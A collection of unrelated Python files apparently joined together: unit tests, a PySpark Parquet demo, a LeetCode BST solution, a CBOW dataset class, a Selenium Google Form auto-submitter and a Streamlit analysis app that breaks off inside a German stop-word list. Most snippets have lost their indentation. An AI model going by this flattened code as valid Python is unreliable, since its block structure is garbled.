# crop_pad_2d must return an array of the same dtype it was given
# in particular, because the method is used for Fourier downsampling
# methods involving cropping complex arrays
self.assertEqual(
crop_pad_2d(np.eye(10).astype("complex"), 5).dtype, np.dtype("complex128")
)
def testCrop2DFillValue(self):
# make sure the fill value is as expected
# we are padding from an odd to an even dimension
# so the padded column is added to the left
a = np.ones((4, 3))
b = crop_pad_2d(a, 4, fill_value=-1)
self.assertTrue(np.array_equal(b[:, 0], np.array([-1, -1, -1, -1])))
|
#!/usr/bin/python
#
# Copyright 2010 Google Inc. All Rights Reserved.
__author__ = 'asharif@google.com (Ahmad Sharif)'
import unittest
from automation.common import machine
from automation.server import machine_manager
class MachineManagerTest(unittest.TestCase):
def setUp(self):
self.machine_manager = machine_manager.MachineManager()
def testPrint(self):
    print(self.machine_manager)
def testGetLinuxBox(self):
mach_spec_list = [machine.MachineSpecification(os='linux')]
machines = self.machine_manager.GetMachines(mach_spec_list)
self.assertTrue(machines)
def testGetChromeOSBox(self):
mach_spec_list = [machine.MachineSpecification(os='chromeos')]
machines = self.machine_manager.GetMachines(mach_spec_list)
self.assertTrue(machines)
if __name__ == '__main__':
unittest.main()
|
from pyspark.sql import SparkSession
spark = SparkSession.builder.master("local").appName('ReadParquet').config("spark.driver.host", "localhost").config(
"spark.ui.port", "4040").getOrCreate()
peopleDF = spark.read.json("people.json")
# DataFrames can be saved as Parquet files, maintaining the schema information.
peopleDF.write.format("parquet").mode("overwrite").save("people.parquet")
# Read in the Parquet file created above.
# Parquet files are self-describing so the schema is preserved.
# The result of loading a parquet file is also a DataFrame.
parquetFile = spark.read.parquet("people.parquet")
# Parquet files can also be used to create a temporary view and then used in SQL statements.
parquetFile.createOrReplaceTempView("parquetFile")
teenagers = spark.sql("SELECT name FROM parquetFile WHERE age >= 13 AND age <= 19")
teenagers.show()
# spark.stop()
|
# ------------------------------
# 530. Minimum Absolute Difference in BST
#
# Description:
# Given a binary search tree with non-negative values, find the minimum absolute difference between values of any two nodes.
# Example:
# Input:
# 1
# \
# 3
# /
# 2
# Output:
# 1
# Explanation:
# The minimum absolute difference is 1, which is the difference between 2 and 1 (or between 2 and 3).
#
# Note: There are at least two nodes in this BST.
#
# Version: 1.0
# 07/14/18 by Jianfa
# ------------------------------
# Definition for a binary tree node.
# class TreeNode(object):
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution(object):
def __init__(self):
self.minDiff = float('inf')
self.pre = None
def getMinimumDifference(self, root):
"""
:type root: TreeNode
:rtype: int
"""
if not root:
return self.minDiff
self.getMinimumDifference(root.left)
        if self.pre is not None:
self.minDiff = min(self.minDiff, root.val - self.pre)
self.pre = root.val
self.getMinimumDifference(root.right)
return self.minDiff
# Used for testing
if __name__ == "__main__":
test = Solution()
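    # Build the example tree from the problem description above (1 with right
    # child 3, whose left child is 2), using the standard LeetCode TreeNode
    # definition that is commented out near the top of this file.
    class TreeNode(object):
        def __init__(self, x):
            self.val = x
            self.left = None
            self.right = None
    root = TreeNode(1)
    root.right = TreeNode(3)
    root.right.left = TreeNode(2)
    print(test.getMinimumDifference(root))  # expected: 1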
# ------------------------------
# Summary:
# In-order traversal solution. Idea from https://leetcode.com/problems/minimum-absolute-difference-in-bst/discuss/99905/Two-Solutions-in-order-traversal-and-a-more-general-way-using-TreeSet
|
import tensorflow as tf
from garage.tf.models import Model
class SimpleMLPModel(Model):
"""Simple MLPModel for testing."""
def __init__(self, name, output_dim, *args, **kwargs):
super().__init__(name)
self.output_dim = output_dim
def _build(self, obs_input):
return tf.fill((tf.shape(obs_input)[0], self.output_dim), 0.5)
|
import numpy as np
import torch
from torch.utils.data import Dataset
class CBOWDataSet(Dataset):
def __init__(self, corpus,
pipeline='hier_softmax',
nodes_index=None,
turns_index=None,
vocab_size=None,
neg_samples=None,
max_path_len=17,
window_size=6,
device=None,
skip_target=False,
dtype=torch.float32):
"""
:param corpus: the flat list of tokens
:param pipeline: 'hier_softmax'/'neg_sampling'
params for 'hierarchical softmax' pipeline:
:param nodes_index: index of nodes from leaf parent to the root
:param turns_index: the list of 1/-1 indices:
1 — the leaf is the left child of corresponding node
-1 — the leaf is the right child
:param vocab_size: is used for padding
:param max_path_len: length of the longest path from word (leaf)
to the root
params for 'negative sampling' pipeline:
:param neg_samples: the number of negative samples
:param window_size: word context size
:param device: cuda:0/cuda:1/cpu
:param dtype: torch float type
"""
self.window_size = window_size
self.step = window_size // 2
self.left_step = self.step
self.right_step = window_size - self.step
self.corpus = corpus[-self.left_step:] + corpus + \
corpus[:self.right_step]
self.device = device
self.dtype = dtype
self.pipeline = pipeline
if self.pipeline == 'hier_softmax':
self.nodes_index = nodes_index
self.max_path_len = max_path_len
self.turns_index = turns_index
self.vocab_size = vocab_size
self.skip_target = skip_target
elif self.pipeline == 'neg_sampling':
self.np_corpus = np.array(self.corpus)
self.neg_samples = neg_samples
else:
            raise NotImplementedError(
                f'Unknown pipeline: {self.pipeline}')
def __len__(self):
return len(self.corpus) - self.window_size
def __getitem__(self, item):
if self.pipeline == 'hier_softmax':
return self.__h_getitem(item)
elif self.pipeline == 'neg_sampling':
return self.__n_getitem(item)
else:
raise NotImplementedError(
f'__getitem__ for pipeline: {self.pipeline}')
def __h_getitem(self, i):
"""
        Hierarchical softmax pipeline
:param i: item index
:return: torch tensors:
context, target, nodes, mask, turns_coeffs
"""
i += self.left_step
target = self.corpus[i]
context = self.corpus[(i - self.left_step):i]
context += self.corpus[(i + 1):(i + self.right_step + 1)]
try:
assert len(context) == self.window_size
except AssertionError:
raise Exception(
'Context size is not valid: context - '
'{0} has size - {1}; window_size - {2}'
.format(context, len(context), self.window_size)
)
nodes = self.nodes_index[target]
nodes_len = len(nodes)
mask = np.zeros(self.max_path_len)
mask[:nodes_len] = 1
pad_len = self.max_path_len - nodes_len
nodes = np.concatenate([nodes, np.ones(pad_len) * self.vocab_size])
# nodes = np.concatenate([nodes, np.ones(pad_len) * -1])
nodes = torch.tensor(nodes, dtype=torch.long, device=self.device)
turns_coeffs = self.turns_index.get(target)
turns_coeffs = np.concatenate([turns_coeffs, np.zeros(pad_len)])
turns_coeffs = torch.tensor(turns_coeffs, dtype=self.dtype,
device=self.device)
mask = torch.tensor(mask, dtype=self.dtype, device=self.device)
context = torch.tensor(context, dtype=torch.long, device=self.device)
target = torch.tensor(target, dtype=torch.long, device=self.device)
if self.skip_target is False:
return context, target, nodes, mask, turns_coeffs
else:
return context, nodes, mask, turns_coeffs
def __n_getitem(self, i):
"""
Negative sampling pipeline
:param i: item index
        :return: torch tensors:
            context, target (note: negative samples themselves are not
            generated in this method, even though self.neg_samples and
            self.np_corpus are stored in __init__)
"""
i += self.left_step
target = self.corpus[i]
context = self.corpus[(i - self.left_step):i]
context += self.corpus[(i + 1):(i + self.right_step + 1)]
try:
assert len(context) == self.window_size
except AssertionError:
raise Exception(
'Context size is not valid: context - '
'{0} has size - {1}; window_size - {2}'
.format(context, len(context), self.window_size)
)
context = torch.tensor(context, dtype=torch.long, device=self.device)
target = torch.tensor(target, dtype=torch.long, device=self.device)
return context, target
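# ----------------------------------------------------------------------
# Minimal usage sketch (not part of the original module): build the dataset
# on a toy integer-encoded corpus with the 'neg_sampling' pipeline and batch
# it with a standard torch DataLoader. The corpus values and hyperparameters
# below are illustrative assumptions only.
if __name__ == "__main__":
    from torch.utils.data import DataLoader
    toy_corpus = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9]  # token ids, not real text
    dataset = CBOWDataSet(toy_corpus,
                          pipeline='neg_sampling',
                          neg_samples=5,
                          window_size=4)
    loader = DataLoader(dataset, batch_size=2, shuffle=True)
    for context, target in loader:
        # context: LongTensor of shape (batch_size, window_size)
        # target:  LongTensor of shape (batch_size,)
        print(context.shape, target.shape)
        break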
|
# pylint: disable=W0212
'''
Unit tests for dynamite.bitwise.
These tests should NOT require MPI.
'''
import unittest as ut
import numpy as np
from dynamite.bitwise import popcount, parity, intlog2
class PopcountParity(ut.TestCase):
test_cases = [
(0, 0),
(1, 1),
(2, 1),
(3, 2),
(4, 1),
(6, 2),
(9, 2),
(11, 3),
(12, 2),
(35, 3),
(59, 5),
(148742, 6)
]
def test_popcount(self):
for x,p in self.test_cases:
with self.subTest(x=x):
self.assertEqual(popcount(x), p)
def test_parity_single(self):
for x,p in self.test_cases:
with self.subTest(x=x):
self.assertEqual(parity(x), p%2)
def test_parity_array(self):
x, p = np.array(self.test_cases, dtype = int).T
self.assertTrue(np.all(parity(x) == p%2))
class IntLog2(ut.TestCase):
test_cases = [
(0, -1),
(1, 0),
(4, 2),
(6, 2),
(12, 3),
(148742, 17)
]
def test_single(self):
for x,l in self.test_cases:
with self.subTest(x=x):
self.assertEqual(intlog2(x), l)
def test_array(self):
x, l = np.array(self.test_cases, dtype = int).T
self.assertTrue(np.all(intlog2(x) == l))
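# Reference-only sketches (assumptions, not the dynamite implementations):
# pure-Python equivalents that reproduce the expected values in the test
# cases above.
def _ref_popcount(x):
    """Number of set bits in x."""
    return bin(x).count('1')
def _ref_parity(x):
    """Parity (0 or 1) of the number of set bits in x."""
    return bin(x).count('1') % 2
def _ref_intlog2(x):
    """Floor of log2(x); returns -1 for x == 0."""
    return x.bit_length() - 1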
if __name__ == '__main__':
ut.main()
|
#import libraries
from selenium import webdriver
import time
import datetime
import pandas as pd
def automate_sender(
    driverpath: str = "Path to chromedriver",
    sender_file_path: str = "sender.txt",
    sender_df_path: str = "mdcu71_namelist.csv",
    greeting_file_path: str = "greeting_mdcu.txt",
    in_production: bool = False
):
"""
if you want to run this code in production mode, please toggle in_production to True
"""
df = pd.read_csv(sender_df_path)
mdcu_list = list(df.mdcu_name)
num_letters = len(mdcu_list)
letter_text = "letters"
if(num_letters == 1):
letter_text = "letter"
mdcu_url = "https://docs.google.com/forms/d/e/1FAIpQLSe4W2RxromJwtqCq8ZzGvgHr6Zy6Bfm44nzcgDlgZeBuZfBGQ/viewform"
if(not in_production):
print("You are in the TEST mode.")
print(f"This script will send {num_letters} {letter_text}.")
with open(sender_file_path, 'r') as sender_file:
sender_txt = f"{sender_file.read()}".format(**locals()).strip()
# sending mail merge
for i in range(len(mdcu_list)):
# rest time from previous session
driver = webdriver.Chrome(driverpath)
time.sleep(1)
        driver.get(mdcu_url)
receiver = mdcu_list[i]
now = datetime.datetime.now().astimezone().strftime("%Y-%m-%d %H:%M:%S UTC%Z")
with open(greeting_file_path, 'r') as greeting_file:
greeting_txt = f"{greeting_file.read()}".format(**locals()).strip()
time.sleep(2)
receiver_fill = driver.find_element_by_xpath('/html/body/div/div[2]/form/div[2]/div/div[2]/div[1]/div/div/div[2]/div/div[1]/div/div[1]/input')
receiver_fill.send_keys(receiver)
sender_fill = driver.find_element_by_xpath('/html/body/div/div[2]/form/div[2]/div/div[2]/div[2]/div/div/div[2]/div/div[1]/div/div[1]/input')
sender_fill.send_keys(sender_txt)
greeting_fill = driver.find_element_by_xpath('/html/body/div/div[2]/form/div[2]/div/div[2]/div[3]/div/div/div[2]/div/div[1]/div[2]/textarea')
greeting_fill.send_keys(greeting_txt)
if (in_production):
submit = driver.find_element_by_xpath('/html/body/div/div[2]/form/div[2]/div/div[3]/div[1]/div/div/span')
submit.click()
time.sleep(2)
driver.close()
print(f"({i+1}/{num_letters}) Letter to {receiver} is sent!")
print("*********************")
print("ALL LETTERS ARE SENT!")
print("*********************")
return
if __name__ == "__main__" :
automate_sender(in_production=True)
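# Dry-run sketch (hypothetical chromedriver path): with in_production=False
# the form is filled but never submitted, which is useful for checking that
# the XPaths still match the Google Form.
#     automate_sender(driverpath="/path/to/chromedriver",
#                     in_production=False)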
|
####################
# IMPORT LIBRARIES #
####################
import streamlit as st
import pandas as pd
import numpy as np
import plotly as dd
import plotly.express as px
import seaborn as sns
import matplotlib.pyplot as plt
import matplotlib.font_manager
import plotly.graph_objects as go
import functions as fc
import modelling as ml
import os
import altair as alt
import bs4
import requests
from collections import Counter
import streamlit.components.v1 as components
import yfinance as yf
import datetime
from wordcloud import WordCloud, STOPWORDS, ImageColorGenerator
from streamlit import caching
import SessionState
import sys
import platform
import re
import base64
from io import BytesIO
from pysummarization.nlpbase.auto_abstractor import AutoAbstractor
from pysummarization.tokenizabledoc.simple_tokenizer import SimpleTokenizer
from pysummarization.web_scraping import WebScraping
from pysummarization.abstractabledoc.std_abstractor import StdAbstractor
from pysummarization.abstractabledoc.top_n_rank_abstractor import TopNRankAbstractor
from sklearn.feature_extraction.text import CountVectorizer
from difflib import SequenceMatcher
#----------------------------------------------------------------------------------------------
def app():
# Clear cache
caching.clear_cache()
# Hide traceback in error messages (comment out for de-bugging)
sys.tracebacklimit = 0
#------------------------------------------------------------------------------------------
# SETTINGS
settings_expander=st.sidebar.beta_expander('Settings')
with settings_expander:
st.caption("**Precision**")
user_precision=st.number_input('Number of digits after the decimal point',min_value=0,max_value=10,step=1,value=4)
#st.caption("**Help**")
#sett_hints = st.checkbox('Show learning hints', value=False)
st.caption("**Appearance**")
sett_wide_mode = st.checkbox('Wide mode', value=False)
sett_theme = st.selectbox('Theme', ["Light", "Dark"])
#sett_info = st.checkbox('Show methods info', value=False)
#sett_prec = st.number_input('Set the number of diggits for the output', min_value=0, max_value=8, value=2)
st.sidebar.markdown("")
st.sidebar.markdown("")
# Check if wide mode
if sett_wide_mode:
fc.wide_mode_func()
# Check theme
if sett_theme == "Dark":
fc.theme_func_dark()
if sett_theme == "Light":
fc.theme_func_light()
fc.theme_func_dl_button()
#++++++++++++++++++++++++++++++++++++++++++++
# RESET INPUT
#st.sidebar.subheader("Reset")
reset_clicked = st.sidebar.button("Reset all your input")
session_state = SessionState.get(id = 0)
if reset_clicked:
session_state.id = session_state.id + 1
st.sidebar.markdown("")
#++++++++++++++++++++++++++++++++++++++++++++
# Text Mining
#++++++++++++++++++++++++++++++++++++++++++++
basic_text="Let STATY do text/web processing for you and start exploring your data stories right below... "
st.header('**Web scraping and text data**')
tw_meth = ['Text analysis','Web-Page summary','Stock data analysis']
tw_classifier = st.selectbox('What analysis would you like to perform?', list('-')+tw_meth, key = session_state.id)
if tw_classifier in tw_meth:
st.write("")
st.write("")
st.header('**'+tw_classifier+'**')
st.markdown(basic_text)
if tw_classifier=='Web-Page summary':
user_path = st.text_input("What what web page should I summarize in five sentences for you?","https://en.wikipedia.org/wiki/Data_mining")
run_models = st.button("Press to start the data processing...")
if run_models:
# Pysummarization of a web page:
def pysumMain(url):
web_scrape = WebScraping()
# Web-scraping:
document = web_scrape.scrape(url)
auto_abstractor = AutoAbstractor()
auto_abstractor.tokenizable_doc = SimpleTokenizer()
# Set delimiter for a sentence:
auto_abstractor.delimiter_list = [".", "\n"]
abstractable_doc = TopNRankAbstractor()
# Summarize a document:
result_dict = auto_abstractor.summarize(document, abstractable_doc)
# Set the limit for the number of output sentences:
limit = 5
i = 1
for sentence in result_dict["summarize_result"]:
st.write(sentence)
if i >= limit:
break
i += 1
#user_path = st.text_input("What what web page should I summarize in five sentences for you?","https://en.wikipedia.org/wiki/Data_mining")
if user_path !='':
a1, a2 = st.beta_columns(2)
with a1:
st.subheader('Web page preview:')
st.text("")
components.iframe(user_path,width=None,height=500,scrolling=True)
with a2:
st.subheader('Web page summary:')
st.text("")
pysumMain(user_path)
if tw_classifier =='Stock data analysis':
            # download first the list of companies in the S&P500 and DAX indices
payload=pd.read_html('https://en.wikipedia.org/wiki/List_of_S%26P_500_companies')
first_table = payload[0]
df = first_table
symbols = df['Symbol'].values.tolist()
company = df['Security'].values.tolist()
sector = df['GICS Sector'].values.tolist()
#sectors = set(sectors)
payload1=pd.read_html('https://en.wikipedia.org/wiki/DAX')
DAXtable = payload1[3]
df=DAXtable
DAXsymbols = df['Ticker symbol'].values.tolist()
DAXSector = df['Prime Standard Sector'].values.tolist()
DAXcompany= df['Company'].values.tolist()
#Merge indices data
symbols_all=symbols+DAXsymbols
sector_all=sector+DAXSector
company_all=company+DAXcompany
#ticker specification
st.subheader('Stock data analysis')
a3, a4 = st.beta_columns(2)
with a3:
selected_stock = st.text_input("Enter a stock ticker symbol", "TSLA")
symbols_all=list('-')+symbols_all
                selected_symbol = st.selectbox('You can add an additional stock for comparison...',symbols_all)
with a4:
today = datetime.date.today()
last_year = today - datetime.timedelta(days=365)
start_date = st.date_input('Select start date', last_year)
end_date = st.date_input('Select end date', today)
if start_date > end_date:
st.error('ERROR: End date must fall after start date.')
st.write("")
add_data_show=st.checkbox("Get additional data (cashflow, balance sheet etc.)", value = False)
st.write("")
dev_expander_perf = st.beta_expander("Stock performance")
with dev_expander_perf:
#get data for a selected ticker symbol:
stock_data = yf.Ticker(selected_stock)
stock_df = stock_data.history(period='1d', start=start_date, end=end_date)
add_stock_data = yf.Ticker(selected_symbol)
add_stock_df = add_stock_data.history(period='1d', start=start_date, end=end_date)
#print stock values
if st.checkbox("Show stock data for " + selected_stock, value = True):
st.write(stock_df)
if selected_symbol !="-":
if st.checkbox("Show stock data for " + selected_symbol, value = False):
st.write(add_stock_df)
comparision_check=st.checkbox('Compare '+ selected_stock + " & " + selected_symbol, value = True)
#draw line chart with stock prices
a5, a6 = st.beta_columns(2)
with a5:
stock_para= st.selectbox('Select ' + selected_stock + " info to draw", stock_df.columns)
if selected_symbol !="-":
if comparision_check:
                            st.subheader('Daily data comparison '+ selected_stock + " & " + selected_symbol)
c1=selected_stock + " " + stock_para
c2=selected_symbol + " " + stock_para
c1_data=stock_df[[stock_para]]
c1_data.rename(columns={c1_data.columns[0]: c1 }, inplace = True)
c2_data=add_stock_df[[stock_para]]
c2_data.rename(columns={c2_data.columns[0]: c2 }, inplace = True)
stock_dataToplot=pd.concat([c1_data, c2_data], axis=1)
#st.write(stock_dataToplot)
st.line_chart(stock_dataToplot)
else:
st.subheader(stock_para + " price for " + selected_stock + " (daily)")
stock_dataToplot=stock_df[stock_para]
st.line_chart(stock_dataToplot)
else:
st.subheader(stock_para + " price for " + selected_stock + " (daily)")
stock_dataToplot=stock_df[stock_para]
st.line_chart(stock_dataToplot)
with a6:
stock_para2= st.selectbox('Select ' + selected_stock + " info to draw", stock_df.columns, index=3)
if selected_symbol !="-":
if comparision_check:
                            st.subheader('Daily data comparison '+ selected_stock + " & " + selected_symbol)
c3=selected_stock + " " + stock_para2
c4=selected_symbol + " " + stock_para2
c3_data=stock_df[[stock_para2]]
c3_data.rename(columns={c3_data.columns[0]: c3 }, inplace = True)
c4_data=add_stock_df[[stock_para2]]
c4_data.rename(columns={c4_data.columns[0]: c4 }, inplace = True)
stock_dataToplot2=pd.concat([c3_data, c4_data], axis=1)
#st.write(stock_dataToplot)
st.line_chart(stock_dataToplot2)
else:
st.subheader(stock_para2 + " price for " + selected_stock + " (daily)")
stock_dataToplot2=stock_df[stock_para2]
st.line_chart(stock_dataToplot2)
else:
st.subheader(stock_para2 + " price for " + selected_stock + " (daily)")
stock_dataToplot2=stock_df[stock_para2]
st.line_chart(stock_dataToplot2)
if add_data_show:
dev_expander_cf = st.beta_expander("Cashflow")
with dev_expander_cf:
st.subheader(selected_stock)
stock_data_cf = yf.Ticker(selected_stock).cashflow
st.write(stock_data_cf)
if selected_symbol !='-':
st.subheader(selected_symbol)
st.write(yf.Ticker(selected_symbol).cashflow)
dev_expander_bs = st.beta_expander("Balance sheet")
with dev_expander_bs:
st.subheader(selected_stock)
stock_data = yf.Ticker(selected_stock)
stock_data_fi = stock_data.balance_sheet
st.write(stock_data_fi)
if selected_symbol !='-':
st.subheader(selected_symbol)
st.write(yf.Ticker(selected_symbol).balance_sheet)
dev_expander_fi = st.beta_expander("Other financials")
with dev_expander_fi:
st.subheader(selected_stock)
stock_data = yf.Ticker(selected_stock)
stock_data_fi = stock_data.financials
st.write(stock_data_fi)
if selected_symbol !='-':
st.subheader(selected_symbol)
st.write(yf.Ticker(selected_symbol).financials)
dev_expander_info = st.beta_expander("Stock basic info")
with dev_expander_info:
st.subheader(selected_stock)
stock_data = yf.Ticker(selected_stock)
st.write(stock_data.info ['longBusinessSummary'])
if selected_symbol !='-':
st.subheader(selected_symbol)
st.write(yf.Ticker(selected_symbol).info ['longBusinessSummary'])
if tw_classifier=='Text analysis':
run_text_OK=False
text_cv = CountVectorizer()
user_color=21
def random_color_func(user_col,word=None, font_size=None, position=None, orientation=None, font_path=None, random_state=None):
h = int(user_color)
s = int(100.0 * 255.0 / 255.0)
l = int(100.0 * float(random_state.randint(60, 120)) / 255.0)
return "hsl({}, {}%, {}%)".format(h, s, l)
#specify the data source
word_sl=st.radio('Select the data source for text analysis',['text input','web page'])
if word_sl=='text input':
user_text=st.text_area('Please enter or copy your text here', value='STATY \n\n STATY is growing out of the effort to bring more data insights to university education across all disciplines of the natural and social sciences. It is motivated by the belief that fostering data literacy, creativity and critical thinking are more effective towards innovation, than bringing endless units of introduction to programming to students who find learning programming an overwhelming task. By providing easy access to the methods of classical statistics and machine learning, STATY’s approach is to inspire students to explore issues they are studying in the curriculum directly on real data, practice interpreting the results and check the source code to see how it is done or to improve the code. STATY can be used in the process of teaching and learning data science, demonstrations of theoretical concepts across various disciplines, active learning, promotion of teamwork, research and beyond.', height=600, key = session_state.id )
st.write("")
if len(user_text)>0:
run_text_OK = True
elif word_sl=='web page':
user_path_wp = st.text_input("What web page should I analyse?","https://en.wikipedia.org/wiki/Data_mining", key = session_state.id)
st.write("")
if user_path_wp !='':
web_scrape = WebScraping()
user_text = web_scrape.scrape(user_path_wp)
run_text_OK = True
if run_text_OK == True:
# Basic text processing:
text_cv_fit=text_cv.fit_transform([user_text])
wordcount= pd.DataFrame(text_cv_fit.toarray().sum(axis=0), index=text_cv.get_feature_names(),columns=["Word count"])
word_sorted=wordcount.sort_values(by=["Word count"], ascending=False)
#Stop words handling:
stopword_selection=st.selectbox("Select stop word option",["No stop words (use all words)","Manually select stop words", "Use a built-in list of stop words in German", "Use a built-in list of stop words in English", "Specify stop words"], index=3, key=session_state.id)
if stopword_selection=="No stop words (use all words)":
word_stopwords=[]
elif stopword_selection=="Manually select stop words":
word_stopwords=st.multiselect("Select stop words (words to be removed from the text)", word_sorted.index.tolist(),word_sorted.index[1:min(10,len(word_sorted.index))].tolist(), key = session_state.id)
elif stopword_selection=="Use a built-in list of stop words in German":
word_stopwords=["a","ab","aber","abermaliges","abermals","abgerufen","abgerufene","abgerufener","abgerufenes","abgesehen","ach","acht","achte","achten","achter","achtes","aehnlich","aehnliche","aehnlichem","aehnlichen","aehnlicher","aehnliches","aehnlichste","aehnlichstem","aehnlichsten","aehnlichster","aehnlichstes","aeusserst","aeusserste","aeusserstem","aeussersten","aeusserster","aeusserstes","ag","ähnlich","ähnliche","ähnlichem","ähnlichen","ähnlicher","ähnliches","ähnlichst","ähnlichste","ähnlichstem","ähnlichsten","ähnlichster","ähnlichstes","alle","allein","alleine","allem","allemal","allen","allenfalls","allenthalben","aller","allerdings","allerlei","alles","allesamt","allg","allg.","allgemein","allgemeine","allgemeinem","allgemeinen","allgemeiner","allgemeines","allgemeinste","allgemeinstem","allgemeinsten","allgemeinster","allgemeinstes","allmählich","allzeit","allzu","als","alsbald","also","am","an","and","andauernd","andauernde","andauerndem","andauernden","andauernder","andauerndes","ander","andere","anderem","anderen","anderenfalls","anderer","andererseits","anderes","anderm","andern","andernfalls","anderr","anders","anderst","anderweitig","anderweitige","anderweitigem","anderweitigen","anderweitiger","anderweitiges","anerkannt","anerkannte","anerkannter","anerkanntes","anfangen","anfing","angefangen","angesetze","angesetzt","angesetzten","angesetzter","ans","anscheinend","ansetzen","ansonst","ansonsten","anstatt","anstelle","arbeiten","au","auch","auf","aufgehört","aufgrund","aufhören","aufhörte","aufzusuchen","augenscheinlich","augenscheinliche","augenscheinlichem","augenscheinlichen","augenscheinlicher","augenscheinliches","augenscheinlichst","augenscheinlichste","augenscheinlichstem","augenscheinlichsten","augenscheinlichster","augenscheinlichstes","aus","ausdrücken","ausdrücklich","ausdrückliche","ausdrücklichem","ausdrücklichen","ausdrücklicher","ausdrückliches","ausdrückt","ausdrückte","ausgenommen","ausgenommene","ausgenommenem","ausgenommenen","ausgenommener","ausgenommenes","ausgerechnet","ausgerechnete","ausgerechnetem","ausgerechneten","ausgerechneter","ausgerechnetes","ausnahmslos","ausnahmslose","ausnahmslosem","ausnahmslosen","ausnahmsloser","ausnahmsloses","außen","außer","ausser","außerdem","ausserdem","außerhalb","äusserst","äusserste","äusserstem","äussersten","äusserster","äusserstes","author","autor","b","baelde","bald","bälde","bearbeite","bearbeiten","bearbeitete","bearbeiteten","bedarf","bedürfen","bedurfte","been","befahl","befiehlt","befiehlte","befohlene","befohlens","befragen","befragte","befragten","befragter","begann","beginnen","begonnen","behalten","behielt","bei","beide","beidem","beiden","beider","beiderlei","beides","beim","beinahe","beisammen","beispiel","beispielsweise","beitragen","beitrugen","bekannt","bekannte","bekannter","bekanntlich","bekanntliche","bekanntlichem","bekanntlichen","bekanntlicher","bekanntliches","bekennen","benutzt","bereits","berichten","berichtet","berichtete","berichteten","besonders","besser","bessere","besserem","besseren","besserer","besseres","bestehen","besteht","besten","bestenfalls","bestimmt","bestimmte","bestimmtem","bestimmten","bestimmter","bestimmtes","beträchtlich","beträchtliche","beträchtlichem","beträchtlichen","beträchtlicher","beträchtliches","betraechtlich","betraechtliche","betraechtlichem","betraechtlichen","betraechtlicher","betraechtliches","betreffend","betreffende","betreffendem","betreffenden","betreffender","betreffendes","bevor","bez","bez.","bezgl","bezgl.","bezueglich","bezüglich","bie
tet","bin","bis","bisher","bisherige","bisherigem","bisherigen","bisheriger","bisheriges","bislang","bisschen","bist","bitte","bleiben","bleibt","blieb","bloss","böden","boeden","brachte","brachten","brauchen","braucht","bräuchte","bringen","bsp","bsp.","bspw","bspw.","bzw","bzw.","c","ca","ca.","circa","d","d.h","da","dabei","dadurch","dafuer","dafür","dagegen","daher","dahin","dahingehend","dahingehende","dahingehendem","dahingehenden","dahingehender","dahingehendes","dahinter","damalige","damaligem","damaligen","damaliger","damaliges","damals","damit","danach","daneben","dank","danke","danken","dann","dannen","daran","darauf","daraus","darf","darfst","darin","darüber","darüberhinaus","darueber","darueberhinaus","darum","darunter","das","dasein","daselbst","daß","dass","dasselbe","Dat","davon","davor","dazu","dazwischen","dein","deine","deinem","deinen","deiner","deines","dem","dementsprechend","demgegenüber","demgegenueber","demgemaess","demgemäß","demgemäss","demnach","demselben","demzufolge","den","denen","denkbar","denkbare","denkbarem","denkbaren","denkbarer","denkbares","denn","dennoch","denselben","der","derart","derartig","derartige","derartigem","derartigen","derartiger","derem","deren","derer","derjenige","derjenigen","dermaßen","dermassen","derselbe","derselben","derzeit","derzeitig","derzeitige","derzeitigem","derzeitigen","derzeitiges","des","deshalb","desselben","dessen","dessenungeachtet","desto","desungeachtet","deswegen","dich","die","diejenige","diejenigen","dies","diese","dieselbe","dieselben","diesem","diesen","dieser","dieses","diesseitig","diesseitige","diesseitigem","diesseitigen","diesseitiger","diesseitiges","diesseits","dinge","dir","direkt","direkte","direkten","direkter","doch","doppelt","dort","dorther","dorthin","dran","drauf","drei","dreißig","drin","dritte","dritten","dritter","drittes","drüber","drueber","drum","drunter","du","duerfte","duerften","duerftest","duerftet","dunklen","durch","durchaus","durchweg","durchwegs","dürfen","dürft","durfte","dürfte","durften","dürften","durftest","dürftest","durftet","dürftet","e","eben","ebenfalls","ebenso","ect","ect.","ehe","eher","eheste","ehestem","ehesten","ehester","ehestes","ehrlich","ei","ei,","eigen","eigene","eigenem","eigenen","eigener","eigenes","eigenst","eigentlich","eigentliche","eigentlichem","eigentlichen","eigentlicher","eigentliches","ein","einander","einbaün","eine","einem","einen","einer","einerlei","einerseits","eines","einfach","einführen","einführte","einführten","eingesetzt","einig","einige","einigem","einigen","einiger","einigermaßen","einiges","einmal","einmalig","einmalige","einmaligem","einmaligen","einmaliger","einmaliges","eins","einseitig","einseitige","einseitigen","einseitiger","einst","einstmals","einzig","elf","empfunden","en","ende","endlich","entgegen","entlang","entsprechend","entsprechende","entsprechendem","entsprechenden","entsprechender","entsprechendes","entweder","er","ergänze","ergänzen","ergänzte","ergänzten","ergo","erhält","erhalten","erhielt","erhielten","erneut","ernst","eröffne","eröffnen","eröffnet","eröffnete","eröffnetes","erscheinen","erst","erste","erstem","ersten","erster","erstere","ersterem","ersteren","ersterer","ersteres","erstes","es","etc","etc.","etliche","etlichem","etlichen","etlicher","etliches","etwa","etwaige","etwas","euch","euer","eure","eurem","euren","eurer","eures","euretwegen","f","fall","falls","fand","fast","ferner","fertig","finde","finden","findest","findet","folgend","folgende","folgendem","folgenden","folgender","folgendermassen","folge
ndes","folglich","for","fordern","fordert","forderte","forderten","fort","fortsetzen","fortsetzt","fortsetzte","fortsetzten","fragte","frau","frei","freie","freier","freies","früher","fuer","fuers","fünf","fünfte","fünften","fünfter","fünftes","für","fürs","g","gab","gaenzlich","gaenzliche","gaenzlichem","gaenzlichen","gaenzlicher","gaenzliches","gängig","gängige","gängigen","gängiger","gängiges","ganz","ganze","ganzem","ganzen","ganzer","ganzes","gänzlich","gänzliche","gänzlichem","gänzlichen","gänzlicher","gänzliches","gar","gbr","geb","geben","geblieben","gebracht","gedurft","geehrt","geehrte","geehrten","geehrter","gefallen","gefälligst","gefällt","gefiel","gegeben","gegen","gegenüber","gegenueber","gehabt","gehalten","gehen","geht","gekannt","gekommen","gekonnt","gemacht","gemaess","gemäss","gemeinhin","gemocht","gemusst","genau","genommen","genug","gepriesener","gepriesenes","gerade","gern","gesagt","geschweige","gesehen","gestern","gestrige","getan","geteilt","geteilte","getragen","getrennt","gewesen","gewiss","gewisse","gewissem","gewissen","gewisser","gewissermaßen","gewisses","gewollt","geworden","ggf","ggf.","gib","gibt","gilt","ging","gleich","gleiche","gleichem","gleichen","gleicher","gleiches","gleichsam","gleichste","gleichstem","gleichsten","gleichst